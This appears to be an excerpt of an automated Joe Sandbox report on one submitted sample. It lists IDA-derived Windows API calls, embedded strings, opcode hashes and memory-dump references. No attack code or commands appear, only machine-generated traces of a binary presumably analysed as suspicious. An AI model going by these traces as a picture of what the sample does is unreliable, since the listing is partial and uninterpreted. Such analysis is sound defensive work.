                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFilefreememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2507021081-0
                                                                                                                                                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                              APIs
                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4131324427-0
                                                                                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PathTemp$free
                                                                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                                                                              • API String ID: 924794160-1420421710
                                                                                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                              • API String ID: 1775345501-2769808009
                                                                                                                                                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                              APIs
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                              • String ID: General
                                                                                                                                                              • API String ID: 999786162-26480598
                                                                                                                                                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                              • String ID: Error$Error %d: %s
                                                                                                                                                              • API String ID: 313946961-1552265934
                                                                                                                                                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                              • API String ID: 0-1953309616
                                                                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                              • API String ID: 3510742995-272990098
                                                                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@$free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2241099983-0
                                                                                                                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                              APIs
                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4053608372-0
                                                                                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                              APIs
                                                                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1471605966-0
                                                                                                                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                              APIs
                                                                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                              • String ID: \StringFileInfo\
                                                                                                                                                              • API String ID: 102104167-2245444037
                                                                                                                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
